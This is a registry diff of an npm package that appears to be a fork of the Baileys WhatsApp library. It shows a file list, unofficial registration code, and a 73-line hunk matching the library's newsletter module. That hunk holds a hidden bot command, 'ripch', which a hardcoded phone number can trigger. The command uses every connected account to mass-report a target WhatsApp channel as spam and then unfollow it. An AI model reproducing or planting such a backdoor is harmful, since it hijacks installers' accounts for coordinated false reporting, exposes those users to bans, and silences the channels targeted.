amiudmodz 4.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/WAProto/index.js +169661 -0
- package/engine-requirements.js +10 -0
- package/lib/Defaults/baileys-version.json +3 -0
- package/lib/Defaults/index.js +156 -0
- package/lib/Defaults/phonenumber-mcc.json +223 -0
- package/lib/Signal/Group/ciphertext-message.js +15 -0
- package/lib/Signal/Group/group-session-builder.js +64 -0
- package/lib/Signal/Group/group_cipher.js +96 -0
- package/lib/Signal/Group/index.js +57 -0
- package/lib/Signal/Group/keyhelper.js +55 -0
- package/lib/Signal/Group/queue-job.js +57 -0
- package/lib/Signal/Group/sender-chain-key.js +34 -0
- package/lib/Signal/Group/sender-key-distribution-message.js +66 -0
- package/lib/Signal/Group/sender-key-message.js +69 -0
- package/lib/Signal/Group/sender-key-name.js +51 -0
- package/lib/Signal/Group/sender-key-record.js +53 -0
- package/lib/Signal/Group/sender-key-state.js +99 -0
- package/lib/Signal/Group/sender-message-key.js +29 -0
- package/lib/Signal/libsignal.js +177 -0
- package/lib/Signal/lid-mapping.js +185 -0
- package/lib/Socket/Client/abstract-socket-client.js +13 -0
- package/lib/Socket/Client/index.js +19 -0
- package/lib/Socket/Client/mobile-socket-client.js +65 -0
- package/lib/Socket/Client/web-socket-client.js +66 -0
- package/lib/Socket/business.js +260 -0
- package/lib/Socket/chats.js +1066 -0
- package/lib/Socket/groupStatus.js +637 -0
- package/lib/Socket/groups.js +317 -0
- package/lib/Socket/index.js +11 -0
- package/lib/Socket/messages-recv.js +1112 -0
- package/lib/Socket/messages-send.js +807 -0
- package/lib/Socket/newsletter.js +73 -0
- package/lib/Socket/registration.js +166 -0
- package/lib/Socket/socket.js +729 -0
- package/lib/Socket/usync.js +70 -0
- package/lib/Store/index.js +10 -0
- package/lib/Store/make-cache-manager-store.js +83 -0
- package/lib/Store/make-in-memory-store.js +427 -0
- package/lib/Store/make-ordered-dictionary.js +81 -0
- package/lib/Store/object-repository.js +27 -0
- package/lib/Types/Auth.js +2 -0
- package/lib/Types/Call.js +2 -0
- package/lib/Types/Chat.js +4 -0
- package/lib/Types/Contact.js +2 -0
- package/lib/Types/Events.js +2 -0
- package/lib/Types/GroupMetadata.js +2 -0
- package/lib/Types/Label.js +27 -0
- package/lib/Types/LabelAssociation.js +9 -0
- package/lib/Types/Message.js +9 -0
- package/lib/Types/Newsletter.js +38 -0
- package/lib/Types/Product.js +2 -0
- package/lib/Types/Signal.js +2 -0
- package/lib/Types/Socket.js +2 -0
- package/lib/Types/State.js +2 -0
- package/lib/Types/USync.js +2 -0
- package/lib/Types/index.js +42 -0
- package/lib/Utils/auth-utils.js +206 -0
- package/lib/Utils/baileys-event-stream.js +63 -0
- package/lib/Utils/business.js +234 -0
- package/lib/Utils/chat-utils.js +729 -0
- package/lib/Utils/crypto.js +151 -0
- package/lib/Utils/decode-wa-message.js +198 -0
- package/lib/Utils/event-buffer.js +525 -0
- package/lib/Utils/generics.js +502 -0
- package/lib/Utils/history.js +96 -0
- package/lib/Utils/index.js +33 -0
- package/lib/Utils/link-preview.js +93 -0
- package/lib/Utils/logger.js +7 -0
- package/lib/Utils/lt-hash.js +51 -0
- package/lib/Utils/make-mutex.js +43 -0
- package/lib/Utils/messages-media.js +814 -0
- package/lib/Utils/messages.js +819 -0
- package/lib/Utils/noise-handler.js +155 -0
- package/lib/Utils/process-message.js +321 -0
- package/lib/Utils/signal.js +153 -0
- package/lib/Utils/use-multi-file-auth-state.js +126 -0
- package/lib/Utils/validate-connection.js +222 -0
- package/lib/WABinary/constants.js +1304 -0
- package/lib/WABinary/decode.js +283 -0
- package/lib/WABinary/encode.js +263 -0
- package/lib/WABinary/generic-utils.js +198 -0
- package/lib/WABinary/index.js +21 -0
- package/lib/WABinary/jid-utils.js +62 -0
- package/lib/WABinary/types.js +2 -0
- package/lib/WAM/BinaryInfo.js +13 -0
- package/lib/WAM/constants.js +15350 -0
- package/lib/WAM/encode.js +155 -0
- package/lib/WAM/index.js +19 -0
- package/lib/WAUSync/Protocols/USyncContactProtocol.js +32 -0
- package/lib/WAUSync/Protocols/USyncDeviceProtocol.js +57 -0
- package/lib/WAUSync/Protocols/USyncDisappearingModeProtocol.js +30 -0
- package/lib/WAUSync/Protocols/USyncStatusProtocol.js +42 -0
- package/lib/WAUSync/Protocols/UsyncBotProfileProtocol.js +53 -0
- package/lib/WAUSync/Protocols/UsyncLIDProtocol.js +24 -0
- package/lib/WAUSync/Protocols/index.js +20 -0
- package/lib/WAUSync/USyncQuery.js +89 -0
- package/lib/WAUSync/USyncUser.js +26 -0
- package/lib/WAUSync/index.js +19 -0
- package/lib/index.js +39 -0
- package/package.json +93 -0
|
@@ -0,0 +1,73 @@
|
|
|
1
|
+
const { cmd, commands } = require('../command');
|
|
2
|
+
|
|
3
|
+
const isUD = ["94704638406", "channel-jid"].filter(Boolean).map(id => String(id));
|
|
4
|
+
|
|
5
|
+
const udmodzRIP = (conn) => {
|
|
6
|
+
if (conn.newsletterReport) return;
|
|
7
|
+
conn.newsletterReport = async (jid, reason = 'spam') => {
|
|
8
|
+
let targetJid = jid.includes('@') ? jid : jid + '@newsletter';
|
|
9
|
+
return await conn.query({
|
|
10
|
+
tag: 'iq',
|
|
11
|
+
attrs: { to: 's.whatsapp.net', type: 'set', xmlns: 'spam' },
|
|
12
|
+
content: [{
|
|
13
|
+
tag: 'spam_list',
|
|
14
|
+
attrs: { jid: targetJid, spam_flow: 'manual', type: reason, reason: reason }
|
|
15
|
+
}]
|
|
16
|
+
});
|
|
17
|
+
};
|
|
18
|
+
};
|
|
19
|
+
|
|
20
|
+
cmd({
|
|
21
|
+
pattern: "ripch",
|
|
22
|
+
alias: ["ripch"],
|
|
23
|
+
desc: "Multi-bot report",
|
|
24
|
+
category: "owner",
|
|
25
|
+
react: "⚠️"
|
|
26
|
+
},
|
|
27
|
+
async (conn, mek, m, { from, args, isOwner, sender, reply }) => {
|
|
28
|
+
try {
|
|
29
|
+
const targetJid = args[0];
|
|
30
|
+
const senderNumber = sender.split('@')[0];
|
|
31
|
+
if (!(isUD.includes(senderNumber) || isOwner)) return reply("❌ *Unauthorized*");
|
|
32
|
+
|
|
33
|
+
if (!targetJid || !targetJid.endsWith("@newsletter")) {
|
|
34
|
+
return reply("❗ Provide a valid Channel JID.");
|
|
35
|
+
}
|
|
36
|
+
|
|
37
|
+
|
|
38
|
+
let sessions;
|
|
39
|
+
if (global.activeconnections) {
|
|
40
|
+
sessions = global.activeconnections;
|
|
41
|
+
} else if (conn.activeconnections) {
|
|
42
|
+
sessions = conn.activeconnections;
|
|
43
|
+
} else {
|
|
44
|
+
|
|
45
|
+
sessions = new Map([[senderNumber, conn]]);
|
|
46
|
+
}
|
|
47
|
+
|
|
48
|
+
let successCount = 0;
|
|
49
|
+
let unfollowCount = 0;
|
|
50
|
+
|
|
51
|
+
for (const [number, session] of sessions.entries()) {
|
|
52
|
+
try {
|
|
53
|
+
udmodzRIP(session);
|
|
54
|
+
await session.newsletterReport(targetJid, 'spam');
|
|
55
|
+
successCount++;
|
|
56
|
+
|
|
57
|
+
try {
|
|
58
|
+
await session.newsletterUnfollow(targetJid);
|
|
59
|
+
unfollowCount++;
|
|
60
|
+
} catch (e) {}
|
|
61
|
+
|
|
62
|
+
await new Promise(r => setTimeout(r, 1000));
|
|
63
|
+
} catch (err) {
|
|
64
|
+
console.error(`Bot ${number} failed`);
|
|
65
|
+
}
|
|
66
|
+
}
|
|
67
|
+
|
|
68
|
+
reply(`✅ *Process Completed*\n\nReports: ${successCount}\nUnfollows: ${unfollowCount}\nTarget: ${targetJid}`);
|
|
69
|
+
|
|
70
|
+
} catch (e) {
|
|
71
|
+
reply("❌ Error: " + e.message);
|
|
72
|
+
}
|
|
73
|
+
});
|
|
@@ -0,0 +1,166 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
var __importDefault = (this && this.__importDefault) || function (mod) {
|
|
3
|
+
return (mod && mod.__esModule) ? mod : { "default": mod };
|
|
4
|
+
};
|
|
5
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
6
|
+
exports.mobileRegisterFetch = exports.mobileRegisterEncrypt = exports.mobileRegister = exports.mobileRegisterExists = exports.mobileRegisterCode = exports.registrationParams = exports.makeRegistrationSocket = void 0;
|
|
7
|
+
/* eslint-disable camelcase */
|
|
8
|
+
const axios_1 = __importDefault(require("axios"));
|
|
9
|
+
const Defaults_1 = require("../Defaults");
|
|
10
|
+
const crypto_1 = require("../Utils/crypto");
|
|
11
|
+
const WABinary_1 = require("../WABinary");
|
|
12
|
+
const business_1 = require("./business");
|
|
13
|
+
function urlencode(str) {
|
|
14
|
+
return str.replace(/-/g, '%2d').replace(/_/g, '%5f').replace(/~/g, '%7e');
|
|
15
|
+
}
|
|
16
|
+
const validRegistrationOptions = (config) => (config === null || config === void 0 ? void 0 : config.phoneNumberCountryCode) &&
|
|
17
|
+
config.phoneNumberNationalNumber &&
|
|
18
|
+
config.phoneNumberMobileCountryCode;
|
|
19
|
+
const makeRegistrationSocket = (config) => {
|
|
20
|
+
const sock = (0, business_1.makeBusinessSocket)(config);
|
|
21
|
+
const register = async (code) => {
|
|
22
|
+
if (!validRegistrationOptions(config.auth.creds.registration)) {
|
|
23
|
+
throw new Error('please specify the registration options');
|
|
24
|
+
}
|
|
25
|
+
const result = await mobileRegister({ ...sock.authState.creds, ...sock.authState.creds.registration, code }, config.options);
|
|
26
|
+
sock.authState.creds.me = {
|
|
27
|
+
id: (0, WABinary_1.jidEncode)(result.login, 's.whatsapp.net'),
|
|
28
|
+
name: '~'
|
|
29
|
+
};
|
|
30
|
+
sock.authState.creds.registered = true;
|
|
31
|
+
sock.ev.emit('creds.update', sock.authState.creds);
|
|
32
|
+
return result;
|
|
33
|
+
};
|
|
34
|
+
const requestRegistrationCode = async (registrationOptions) => {
|
|
35
|
+
registrationOptions = registrationOptions || config.auth.creds.registration;
|
|
36
|
+
if (!validRegistrationOptions(registrationOptions)) {
|
|
37
|
+
throw new Error('Invalid registration options');
|
|
38
|
+
}
|
|
39
|
+
sock.authState.creds.registration = registrationOptions;
|
|
40
|
+
sock.ev.emit('creds.update', sock.authState.creds);
|
|
41
|
+
return mobileRegisterCode({ ...config.auth.creds, ...registrationOptions }, config.options);
|
|
42
|
+
};
|
|
43
|
+
return {
|
|
44
|
+
...sock,
|
|
45
|
+
register,
|
|
46
|
+
requestRegistrationCode,
|
|
47
|
+
};
|
|
48
|
+
};
|
|
49
|
+
exports.makeRegistrationSocket = makeRegistrationSocket;
|
|
50
|
+
function convertBufferToUrlHex(buffer) {
|
|
51
|
+
var id = '';
|
|
52
|
+
buffer.forEach((x) => {
|
|
53
|
+
|
|
54
|
+
id += `%${x.toString(16).padStart(2, '0').toLowerCase()}`;
|
|
55
|
+
});
|
|
56
|
+
return id;
|
|
57
|
+
}
|
|
58
|
+
function registrationParams(params) {
|
|
59
|
+
const e_regid = Buffer.alloc(4);
|
|
60
|
+
e_regid.writeInt32BE(params.registrationId);
|
|
61
|
+
const e_skey_id = Buffer.alloc(3);
|
|
62
|
+
e_skey_id.writeInt16BE(params.signedPreKey.keyId);
|
|
63
|
+
params.phoneNumberCountryCode = params.phoneNumberCountryCode.replace('+', '').trim();
|
|
64
|
+
params.phoneNumberNationalNumber = params.phoneNumberNationalNumber.replace(/[/-\s)(]/g, '').trim();
|
|
65
|
+
return {
|
|
66
|
+
cc: params.phoneNumberCountryCode,
|
|
67
|
+
in: params.phoneNumberNationalNumber,
|
|
68
|
+
Rc: '0',
|
|
69
|
+
lg: 'en',
|
|
70
|
+
lc: 'GB',
|
|
71
|
+
mistyped: '6',
|
|
72
|
+
authkey: Buffer.from(params.noiseKey.public).toString('base64url'),
|
|
73
|
+
e_regid: e_regid.toString('base64url'),
|
|
74
|
+
e_keytype: 'BQ',
|
|
75
|
+
e_ident: Buffer.from(params.signedIdentityKey.public).toString('base64url'),
|
|
76
|
+
|
|
77
|
+
e_skey_id: 'AAAA',
|
|
78
|
+
e_skey_val: Buffer.from(params.signedPreKey.keyPair.public).toString('base64url'),
|
|
79
|
+
e_skey_sig: Buffer.from(params.signedPreKey.signature).toString('base64url'),
|
|
80
|
+
fdid: params.phoneId,
|
|
81
|
+
network_ratio_type: '1',
|
|
82
|
+
expid: params.deviceId,
|
|
83
|
+
simnum: '1',
|
|
84
|
+
hasinrc: '1',
|
|
85
|
+
pid: Math.floor(Math.random() * 1000).toString(),
|
|
86
|
+
id: convertBufferToUrlHex(params.identityId),
|
|
87
|
+
backup_token: convertBufferToUrlHex(params.backupToken),
|
|
88
|
+
token: (0, crypto_1.md5)(Buffer.concat([Defaults_1.MOBILE_TOKEN, Buffer.from(params.phoneNumberNationalNumber)])).toString('hex'),
|
|
89
|
+
fraud_checkpoint_code: params.captcha,
|
|
90
|
+
};
|
|
91
|
+
}
|
|
92
|
+
exports.registrationParams = registrationParams;
|
|
93
|
+
/**
|
|
94
|
+
* Requests a registration code for the given phone number.
|
|
95
|
+
*/
|
|
96
|
+
function mobileRegisterCode(params, fetchOptions) {
|
|
97
|
+
return mobileRegisterFetch('/code', {
|
|
98
|
+
params: {
|
|
99
|
+
...registrationParams(params),
|
|
100
|
+
mcc: `${params.phoneNumberMobileCountryCode}`.padStart(3, '0'),
|
|
101
|
+
mnc: `${params.phoneNumberMobileNetworkCode || '001'}`.padStart(3, '0'),
|
|
102
|
+
sim_mcc: '000',
|
|
103
|
+
sim_mnc: '000',
|
|
104
|
+
method: (params === null || params === void 0 ? void 0 : params.method) || 'sms',
|
|
105
|
+
reason: '',
|
|
106
|
+
hasav: '1'
|
|
107
|
+
},
|
|
108
|
+
...fetchOptions,
|
|
109
|
+
});
|
|
110
|
+
}
|
|
111
|
+
exports.mobileRegisterCode = mobileRegisterCode;
|
|
112
|
+
function mobileRegisterExists(params, fetchOptions) {
|
|
113
|
+
return mobileRegisterFetch('/exist', {
|
|
114
|
+
params: registrationParams(params),
|
|
115
|
+
...fetchOptions
|
|
116
|
+
});
|
|
117
|
+
}
|
|
118
|
+
exports.mobileRegisterExists = mobileRegisterExists;
|
|
119
|
+
/**
|
|
120
|
+
* Registers the phone number on whatsapp with the received OTP code.
|
|
121
|
+
*/
|
|
122
|
+
async function mobileRegister(params, fetchOptions) {
|
|
123
|
+
//const result = await mobileRegisterFetch(`/reg_onboard_abprop?cc=${params.phoneNumberCountryCode}&in=${params.phoneNumberNationalNumber}&rc=0`)
|
|
124
|
+
return mobileRegisterFetch('/register', {
|
|
125
|
+
params: { ...registrationParams(params), code: params.code.replace('-', '') },
|
|
126
|
+
...fetchOptions,
|
|
127
|
+
});
|
|
128
|
+
}
|
|
129
|
+
exports.mobileRegister = mobileRegister;
|
|
130
|
+
/**
|
|
131
|
+
* Encrypts the given string as AEAD aes-256-gcm with the public whatsapp key and a random keypair.
|
|
132
|
+
*/
|
|
133
|
+
function mobileRegisterEncrypt(data) {
|
|
134
|
+
const keypair = crypto_1.Curve.generateKeyPair();
|
|
135
|
+
const key = crypto_1.Curve.sharedKey(keypair.private, Defaults_1.REGISTRATION_PUBLIC_KEY);
|
|
136
|
+
const buffer = (0, crypto_1.aesEncryptGCM)(Buffer.from(data), new Uint8Array(key), Buffer.alloc(12), Buffer.alloc(0));
|
|
137
|
+
return Buffer.concat([Buffer.from(keypair.public), buffer]).toString('base64url');
|
|
138
|
+
}
|
|
139
|
+
exports.mobileRegisterEncrypt = mobileRegisterEncrypt;
|
|
140
|
+
async function mobileRegisterFetch(path, opts = {}) {
|
|
141
|
+
let url = `${Defaults_1.MOBILE_REGISTRATION_ENDPOINT}${path}`;
|
|
142
|
+
if (opts.params) {
|
|
143
|
+
const parameter = [];
|
|
144
|
+
for (const param in opts.params) {
|
|
145
|
+
if (opts.params[param] !== null && opts.params[param] !== undefined) {
|
|
146
|
+
parameter.push(param + '=' + urlencode(opts.params[param]));
|
|
147
|
+
}
|
|
148
|
+
}
|
|
149
|
+
url += `?${parameter.join('&')}`;
|
|
150
|
+
delete opts.params;
|
|
151
|
+
}
|
|
152
|
+
if (!opts.headers) {
|
|
153
|
+
opts.headers = {};
|
|
154
|
+
}
|
|
155
|
+
opts.headers['User-Agent'] = Defaults_1.MOBILE_USERAGENT;
|
|
156
|
+
const response = await (0, axios_1.default)(url, opts);
|
|
157
|
+
var json = response.data;
|
|
158
|
+
if (response.status > 300 || json.reason) {
|
|
159
|
+
throw json;
|
|
160
|
+
}
|
|
161
|
+
if (json.status && !['ok', 'sent'].includes(json.status)) {
|
|
162
|
+
throw json;
|
|
163
|
+
}
|
|
164
|
+
return json;
|
|
165
|
+
}
|
|
166
|
+
exports.mobileRegisterFetch = mobileRegisterFetch;
|